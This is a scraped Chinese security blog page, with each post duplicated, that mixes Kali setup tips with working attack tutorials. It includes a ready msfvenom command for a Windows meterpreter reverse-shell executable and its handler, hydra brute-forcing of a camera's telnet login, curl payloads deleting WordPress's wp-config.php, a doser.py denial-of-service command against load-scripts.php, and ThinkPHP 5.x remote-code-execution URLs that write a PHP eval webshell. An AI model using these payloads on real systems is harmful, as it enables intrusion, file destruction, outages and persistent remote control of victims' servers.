搜索论坛

一、配置SSH参数修改sshd_config文件，命令为：vi /etc/ssh/sshd_config 将#PasswordAuthentication no的注释去掉，并且将NO修改为YES //kali中默认是yes 将PermitRootLogin without-password修改为PermitRootLogin yes 然后保存退出vi编辑器。 二、启动SSH服务命令为：/etc/init.d/ssh start 或者service ssh start 查看SSH服务状态是否正常运行，命令为： /etc/init.d/ssh status 或者 service ssh status注明：这两种启动ssh方式都是临时性的，如果机器重启就需要重新输入上面命令才可以开启ssh，如果需要ssh服务下次开机自动启动，则需要使用以下命令启动ssh服务，命令为： update-rc.d ssh enable //系统自动启动SSH服务 update-rc.d ssh disabled // 关闭系统自动启动SSH服务三、错误解决如果以上两个步骤都操作完了还是登陆不了kali linux的ssh，则需要生成两个秘钥 那么要先生成两个密钥： #ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key #ssh-keygen -t dsa -f /etc/ssh/ssh_host_rsa_key执行命令后都会让输入密码，直接敲回车设置为空即可 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/98.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

一、配置SSH参数修改sshd_config文件，命令为：vi /etc/ssh/sshd_config 将#PasswordAuthentication no的注释去掉，并且将NO修改为YES //kali中默认是yes 将PermitRootLogin without-password修改为PermitRootLogin yes 然后保存退出vi编辑器。 二、启动SSH服务命令为：/etc/init.d/ssh start 或者service ssh start 查看SSH服务状态是否正常运行，命令为： /etc/init.d/ssh status 或者 service ssh status注明：这两种启动ssh方式都是临时性的，如果机器重启就需要重新输入上面命令才可以开启ssh，如果需要ssh服务下次开机自动启动，则需要使用以下命令启动ssh服务，命令为： update-rc.d ssh enable //系统自动启动SSH服务 update-rc.d ssh disabled // 关闭系统自动启动SSH服务三、错误解决如果以上两个步骤都操作完了还是登陆不了kali linux的ssh，则需要生成两个秘钥 那么要先生成两个密钥： #ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key #ssh-keygen -t dsa -f /etc/ssh/ssh_host_rsa_key执行命令后都会让输入密码，直接敲回车设置为空即可 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/98.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

对于升级后的aircrack-ng 和以前的 大不一样，特别是监听模式的设置，很多人会出现找不到设备会命令出错的各种原因我们先去官网（http://www.aircrack-ng.org/doku.php?id=compatibility_drivers）确定自己网卡是否有被kali2集成后就可以按照以下步骤 进行新的命令操作： 第一步：在设置监听模式前先输入airmon-ng check kill结束进程 第二步：和以前一样载入网卡airmon-ng start wlan0（自己的网卡名） 第三步：他会自动创建一个 wlan0mon接口 记住这个 接口名 而不是以前的mon0 第四步：建立监听 airodump-ng wlan0mon 如果在第四步发现出现错误 那么 有三种可能第一 你的网卡不支持监听模式，第二你的wlan0mon输入错误，第三网卡被其他进程给调用无法获取 第三种情况解决方法：执行airmon-ng check kill 执行 ifconfig wlan0mon up airmon-ng stop wlan0mon 最后跳回上面的第二部进行 如果还不行 那就拔掉网卡 或重启 再次ifconfig 查找时候有无线网卡 标识名一般以wlan开头 如果没有 就 ifconfig wlan0 （或者wlan1 wlan2.。。。载入） up 发现了 并载入了 wlan0跟着第一步走一般不会出错 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/114.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

对于升级后的aircrack-ng 和以前的 大不一样，特别是监听模式的设置，很多人会出现找不到设备会命令出错的各种原因我们先去官网（http://www.aircrack-ng.org/doku.php?id=compatibility_drivers）确定自己网卡是否有被kali2集成后就可以按照以下步骤 进行新的命令操作： 第一步：在设置监听模式前先输入airmon-ng check kill结束进程 第二步：和以前一样载入网卡airmon-ng start wlan0（自己的网卡名） 第三步：他会自动创建一个 wlan0mon接口 记住这个 接口名 而不是以前的mon0 第四步：建立监听 airodump-ng wlan0mon 如果在第四步发现出现错误 那么 有三种可能第一 你的网卡不支持监听模式，第二你的wlan0mon输入错误，第三网卡被其他进程给调用无法获取 第三种情况解决方法：执行airmon-ng check kill 执行 ifconfig wlan0mon up airmon-ng stop wlan0mon 最后跳回上面的第二部进行 如果还不行 那就拔掉网卡 或重启 再次ifconfig 查找时候有无线网卡 标识名一般以wlan开头 如果没有 就 ifconfig wlan0 （或者wlan1 wlan2.。。。载入） up 发现了 并载入了 wlan0跟着第一步走一般不会出错 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/114.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

git clone https://github.com/getlantern/lantern.git sudoapt-getinstalllibc6-dev-i386golangnpmlibappindicator3-devlibgtk-3-devlibappindicator3-y npmigulp-g link/usr/bin/nodejs/usr/bin/node cdlantern makelantern ./lantern 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/119.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

自从Kali 2.0发布之后，会经常遇到安装vmware tools无法成功，或者提示安装成功了但是仍旧无法进行文件拖拽、复制和剪切的问题。 今天给新电脑装系统，重新下载了最新版，Kali 2017.1发现已经是Kali 3了。 经测试，安装Open-vm-tools替代VMware tools能够完美实现“自动适应客户机”（即自动适应客户机的分辨率，随意改变窗口大小）和与宿主机之间文件的复制粘贴功能。 安装apt-get install open-vm-tools-desktop fuse重启reboot 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/121.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

git clone https://github.com/getlantern/lantern.git sudoapt-getinstalllibc6-dev-i386golangnpmlibappindicator3-devlibgtk-3-devlibappindicator3-y npmigulp-g link/usr/bin/nodejs/usr/bin/node cdlantern makelantern ./lantern 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/119.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

自从Kali 2.0发布之后，会经常遇到安装vmware tools无法成功，或者提示安装成功了但是仍旧无法进行文件拖拽、复制和剪切的问题。 今天给新电脑装系统，重新下载了最新版，Kali 2017.1发现已经是Kali 3了。 经测试，安装Open-vm-tools替代VMware tools能够完美实现“自动适应客户机”（即自动适应客户机的分辨率，随意改变窗口大小）和与宿主机之间文件的复制粘贴功能。 安装apt-get install open-vm-tools-desktop fuse重启reboot 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/121.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

一：制作对话框msfvenom -a x86 --platform windows -p windows/messagebox TEXT="bbskali.cn" -f raw > messageBox -a:操作系统的类型 64位和32位 -p:指定攻击平台 windows TEXT:对话框中显示的文字 -f:输出格式 二：制作二级标题msfvenom -c messageBox -a x86 --platform windows -p windows/messagebox TEXT="blog.bbskali.cn" -f raw > messageBox2 三：将c++打包生成exemsfvenom -c messageBox2 -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.3.209 LPORT=5555 -f exe -o Z.exeLHOST:本机ip地址 LPORT:端口 -o :生成文件 四：终端启动msfconsole并配置参数msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(multi/handler) > set LHOST 192.168.3.209 LHOST => 192.168.3.209 msf exploit(multi/handler) > set LPORT 5555 LPORT => 5555 msf exploit(multi/handler) > exploit五：运行马儿 六：得到shell 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/169.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

一：制作对话框msfvenom -a x86 --platform windows -p windows/messagebox TEXT="bbskali.cn" -f raw > messageBox -a:操作系统的类型 64位和32位 -p:指定攻击平台 windows TEXT:对话框中显示的文字 -f:输出格式 二：制作二级标题msfvenom -c messageBox -a x86 --platform windows -p windows/messagebox TEXT="blog.bbskali.cn" -f raw > messageBox2 三：将c++打包生成exemsfvenom -c messageBox2 -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.3.209 LPORT=5555 -f exe -o Z.exeLHOST:本机ip地址 LPORT:端口 -o :生成文件 四：终端启动msfconsole并配置参数msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(multi/handler) > set LHOST 192.168.3.209 LHOST => 192.168.3.209 msf exploit(multi/handler) > set LPORT 5555 LPORT => 5555 msf exploit(multi/handler) > exploit五：运行马儿 六：得到shell 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/169.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

前言发现一款摄像头，抱着好奇的心态，开始了漫长的渗透之路。 扫描目标及端口扫描目标： nmap -P0 192.168.6.1/24发现设备192.168.6.102为新设备，我们对此ip进行端口扫描 端口扫描： nmap -T4 -A 192.168.6.102 效果如下： 我们可以看到，当前开启的端口有21 23 80 30000等端口。 访问80端口 提示安装插件，嗯……懒得安装，接着来 既然开启了21和23端口，这说明存在ftp和telnet服务，我们尝试弱口令登录。 然而，并没有卵用。 尝试暴力破解新建一个my.txt字典，尝试暴力破解 hydra 192.168.6.102 telnet -l admin -P /root/my.txt -V 恩，还是没结果，别放弃，接着来！ 在扫描端口的时候，发现存在30000端口，恩，这是什么鬼，看看！ 浏览器访问30000端口 出现一串神秘的字符，等等，这串字符是不是设备的ID呢？带着这个设想，我下载了他们产品的APP 如图，输入设备id，账号和密码默认！ 点击保存，激动人心的提示保存成功。 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/314.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

前言发现一款摄像头，抱着好奇的心态，开始了漫长的渗透之路。 扫描目标及端口扫描目标： nmap -P0 192.168.6.1/24发现设备192.168.6.102为新设备，我们对此ip进行端口扫描 端口扫描： nmap -T4 -A 192.168.6.102 效果如下： 我们可以看到，当前开启的端口有21 23 80 30000等端口。 访问80端口 提示安装插件，嗯……懒得安装，接着来 既然开启了21和23端口，这说明存在ftp和telnet服务，我们尝试弱口令登录。 然而，并没有卵用。 尝试暴力破解新建一个my.txt字典，尝试暴力破解 hydra 192.168.6.102 telnet -l admin -P /root/my.txt -V 恩，还是没结果，别放弃，接着来！ 在扫描端口的时候，发现存在30000端口，恩，这是什么鬼，看看！ 浏览器访问30000端口 出现一串神秘的字符，等等，这串字符是不是设备的ID呢？带着这个设想，我下载了他们产品的APP 如图，输入设备id，账号和密码默认！ 点击保存，激动人心的提示保存成功。 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/314.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

漏洞分析1.文件wp-includes/post.php中： function wp_delete_attachment( $post_id, $force_delete = false ) { $meta = wp_get_attachment_metadata( $post_id ); if ( ! empty($meta['thumb']) ) { // Don't delete the thumb if another attachment uses it. if (! $wpdb->get_row( $wpdb->prepare( "SELECT meta_id FROM $wpdb->postmeta WHERE meta_key = '_wp_attachment_metadata' AND meta_value LIKE %s AND post_id <> %d", '%' . $wpdb->esc_like( $meta['thumb'] ) . '%', $post_id)) ) { $thumbfile = str_replace(basename($file), $meta['thumb'], $file); /** This filter is documented in wp-includes/functions.php */ $thumbfile = apply_filters( 'wp_delete_file', $thumbfile ); @ unlink( path_join($uploadpath['basedir'], $thumbfile) ); } } }$meta['thumb']来自与数据库，是图片的属性之一。代码未检查$meta['thumb']的内容，直接带入unlink函数，如果$meta['thumb']可控则可导致文件删除。 2.文件/wp-admin/post.php中： switch($action) { case 'editattachment': check_admin_referer('update-post_' . $post_id); // Update the thumbnail filename $newmeta = wp_get_attachment_metadata( $post_id, true ); $newmeta['thumb'] = $_POST['thumb']; wp_update_attachment_metadata( $post_id, $newmeta );$newmeta['thumb']来自于$_POST['thumb']，未经过滤直接将其存入数据库，即上一步的$meta['thumb']可控。 详细分析可见：WARNING: WordPress File Delete to Code Execution - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/ 漏洞利用登录后台，添加媒体 访问 http://你的域名/wp-admin/upload.php, 上传任意图片. 将 $meta['thumb'] 设置为我们要删除的文件 3.1 点击第二步中我们上传的图片, 并记住图片ID. 3.2 访问 http://你的域名/wp-admin/post.php?post=4&action=edit. 在网页源代码中找到 _wpnonce. 发送Payload:curl -v 'http://9c9b.vsplate.me/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php'删除文件4.1 在网页源码中找到另外一个 _wpnonce. 发送Payload:curl -v 'http://9c9b.vsplate.me/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***'刷新网页已经可以重装网站。 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/364.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

漏洞分析在文件 WordPress/wp-admin/load-scripts.php 中： <?php ...//ignore $load = $_GET['load']; if ( is_array( $load ) ) { $load = implode( '', $load ); } $load = preg_replace( '/[^a-z0-9,_-]+/i', '', $load ); $load = array_unique( explode( ',', $load ) ); ...//ignore foreach ( $load as $handle ) { if ( ! array_key_exists( $handle, $wp_scripts->registered ) ) { continue; } $path = ABSPATH . $wp_scripts->registered[ $handle ]->src; $out .= get_file( $path ) . "\n"; } ...//ignore echo $out; exit;load-scripts.php 文件会根据load参数传入的文件名依次载入文件并输出。同时程序对load参数的内容进行了过滤，只有在白名单$wp_scripts中的JS文件才会被载入。 该JS文件白名单的内容在文件 WordPress/wp-includes/script-loader.php 中： ...//ignore $scripts->add( 'wp-lists', "/wp-includes/js/wp-lists$suffix.js", array( 'wp-ajax-response', 'jquery-color' ), false, 1 ); // WordPress no longer uses or bundles Prototype or script.aculo.us. These are now pulled from an external source. $scripts->add( 'prototype', 'https://ajax.googleapis.com/ajax/libs/prototype/1.7.1.0/prototype.js', array(), '1.7.1' ); $scripts->add( 'scriptaculous-root', 'https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/scriptaculous.js', array( 'prototype' ), '1.9.0' ); $scripts->add( 'scriptaculous-builder', 'https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/builder.js', array( 'scriptaculous-root' ), '1.9.0' ); $scripts->add( 'scriptaculous-dragdrop', 'https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/dragdrop.js', array( 'scriptaculous-builder', 'scriptaculous-effects' ), '1.9.0' ); ...//ignore $scripts->add( 'jquery-ui-sortable', "/wp-includes/js/jquery/ui/sortable$dev_suffix.js", array( 'jquery-ui-mouse' ), '1.11.4', 1 ); $scripts->add( 'jquery-ui-spinner', "/wp-includes/js/jquery/ui/spinner$dev_suffix.js", array( 'jquery-ui-button' ), '1.11.4', 1 ); $scripts->add( 'jquery-ui-tabs', "/wp-includes/js/jquery/ui/tabs$dev_suffix.js", array( 'jquery-ui-core', 'jquery-ui-widget' ), '1.11.4', 1 ); $scripts->add( 'jquery-ui-tooltip', "/wp-includes/js/jquery/ui/tooltip$dev_suffix.js", array( 'jquery-ui-core', 'jquery-ui-widget', 'jquery-ui-position' ), '1.11.4', 1 ); $scripts->add( 'jquery-ui-widget', "/wp-includes/js/jquery/ui/widget$dev_suffix.js", array( 'jquery' ), '1.11.4', 1 ); ...//ignoreJS文件白名单中共有181个文。如果我们请求 load-scripts.php 文件使其同时载入全部JS文件，PHP代码将要进行181次的读取操作。若同时发起多个载入全部JS文件的请求，这将极大地消耗服务器资源，即有可能导致网站无法正常响应其他用户的请求。 漏洞利用下载 doser.py 脚本 下载地址：https://github.com/quitten/doser.py 使用 doser.py 发起拒绝服务攻击将下列命令中的***.vsplate.me替换为您的实验环境地址。 执行系统命令： python doser.py -g 'http://***.vsplate.me/wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter&ver=4.9' -t 100利用成功，目标主机无法访问 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/360.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

漏洞分析在文件 WordPress/wp-admin/load-scripts.php 中： <?php ...//ignore $load = $_GET['load']; if ( is_array( $load ) ) { $load = implode( '', $load ); } $load = preg_replace( '/[^a-z0-9,_-]+/i', '', $load ); $load = array_unique( explode( ',', $load ) ); ...//ignore foreach ( $load as $handle ) { if ( ! array_key_exists( $handle, $wp_scripts->registered ) ) { continue; } $path = ABSPATH . $wp_scripts->registered[ $handle ]->src; $out .= get_file( $path ) . "\n"; } ...//ignore echo $out; exit;load-scripts.php 文件会根据load参数传入的文件名依次载入文件并输出。同时程序对load参数的内容进行了过滤，只有在白名单$wp_scripts中的JS文件才会被载入。 该JS文件白名单的内容在文件 WordPress/wp-includes/script-loader.php 中： ...//ignore $scripts->add( 'wp-lists', "/wp-includes/js/wp-lists$suffix.js", array( 'wp-ajax-response', 'jquery-color' ), false, 1 ); // WordPress no longer uses or bundles Prototype or script.aculo.us. These are now pulled from an external source. $scripts->add( 'prototype', 'https://ajax.googleapis.com/ajax/libs/prototype/1.7.1.0/prototype.js', array(), '1.7.1' ); $scripts->add( 'scriptaculous-root', 'https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/scriptaculous.js', array( 'prototype' ), '1.9.0' ); $scripts->add( 'scriptaculous-builder', 'https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/builder.js', array( 'scriptaculous-root' ), '1.9.0' ); $scripts->add( 'scriptaculous-dragdrop', 'https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/dragdrop.js', array( 'scriptaculous-builder', 'scriptaculous-effects' ), '1.9.0' ); ...//ignore $scripts->add( 'jquery-ui-sortable', "/wp-includes/js/jquery/ui/sortable$dev_suffix.js", array( 'jquery-ui-mouse' ), '1.11.4', 1 ); $scripts->add( 'jquery-ui-spinner', "/wp-includes/js/jquery/ui/spinner$dev_suffix.js", array( 'jquery-ui-button' ), '1.11.4', 1 ); $scripts->add( 'jquery-ui-tabs', "/wp-includes/js/jquery/ui/tabs$dev_suffix.js", array( 'jquery-ui-core', 'jquery-ui-widget' ), '1.11.4', 1 ); $scripts->add( 'jquery-ui-tooltip', "/wp-includes/js/jquery/ui/tooltip$dev_suffix.js", array( 'jquery-ui-core', 'jquery-ui-widget', 'jquery-ui-position' ), '1.11.4', 1 ); $scripts->add( 'jquery-ui-widget', "/wp-includes/js/jquery/ui/widget$dev_suffix.js", array( 'jquery' ), '1.11.4', 1 ); ...//ignoreJS文件白名单中共有181个文。如果我们请求 load-scripts.php 文件使其同时载入全部JS文件，PHP代码将要进行181次的读取操作。若同时发起多个载入全部JS文件的请求，这将极大地消耗服务器资源，即有可能导致网站无法正常响应其他用户的请求。 漏洞利用下载 doser.py 脚本 下载地址：https://github.com/quitten/doser.py 使用 doser.py 发起拒绝服务攻击将下列命令中的***.vsplate.me替换为您的实验环境地址。 执行系统命令： python doser.py -g 'http://***.vsplate.me/wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter&ver=4.9' -t 100利用成功，目标主机无法访问 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/360.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

漏洞分析1.文件wp-includes/post.php中： function wp_delete_attachment( $post_id, $force_delete = false ) { $meta = wp_get_attachment_metadata( $post_id ); if ( ! empty($meta['thumb']) ) { // Don't delete the thumb if another attachment uses it. if (! $wpdb->get_row( $wpdb->prepare( "SELECT meta_id FROM $wpdb->postmeta WHERE meta_key = '_wp_attachment_metadata' AND meta_value LIKE %s AND post_id <> %d", '%' . $wpdb->esc_like( $meta['thumb'] ) . '%', $post_id)) ) { $thumbfile = str_replace(basename($file), $meta['thumb'], $file); /** This filter is documented in wp-includes/functions.php */ $thumbfile = apply_filters( 'wp_delete_file', $thumbfile ); @ unlink( path_join($uploadpath['basedir'], $thumbfile) ); } } }$meta['thumb']来自与数据库，是图片的属性之一。代码未检查$meta['thumb']的内容，直接带入unlink函数，如果$meta['thumb']可控则可导致文件删除。 2.文件/wp-admin/post.php中： switch($action) { case 'editattachment': check_admin_referer('update-post_' . $post_id); // Update the thumbnail filename $newmeta = wp_get_attachment_metadata( $post_id, true ); $newmeta['thumb'] = $_POST['thumb']; wp_update_attachment_metadata( $post_id, $newmeta );$newmeta['thumb']来自于$_POST['thumb']，未经过滤直接将其存入数据库，即上一步的$meta['thumb']可控。 详细分析可见：WARNING: WordPress File Delete to Code Execution - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/ 漏洞利用登录后台，添加媒体 访问 http://你的域名/wp-admin/upload.php, 上传任意图片. 将 $meta['thumb'] 设置为我们要删除的文件 3.1 点击第二步中我们上传的图片, 并记住图片ID. 3.2 访问 http://你的域名/wp-admin/post.php?post=4&action=edit. 在网页源代码中找到 _wpnonce. 发送Payload:curl -v 'http://9c9b.vsplate.me/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php'删除文件4.1 在网页源码中找到另外一个 _wpnonce. 发送Payload:curl -v 'http://9c9b.vsplate.me/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***'刷新网页已经可以重装网站。 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/364.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

前言ThinkPHP官方2018年12月9日发布重要的安全更新，修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新，由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞，受影响的版本包括5.0和5.1版本，推荐尽快更新到最新版本。 漏洞分析Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f Thinkphp v5.1.x补丁地址: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815 关键代码：// 获取控制器名 $controller = strip_tags($result[1] ?: $this->rule->getConfig('default_controller'));在修复之前程序未对控制器进行过滤，导致攻击者可以通过引入\符号来调用任意类方法。 漏洞利用执行系统命令显示目录下文件http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l 执行phpinfohttp://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();' 写info.php文件http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20phpinfo();?>%27%20>%20info.php访问 info.php 同理，我们可以利用此方法写入PHP一句话木马。 index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php @eval($_POST['c']);?>%27%20>%20inf.php然后我们用菜刀连接即可。 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/576.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

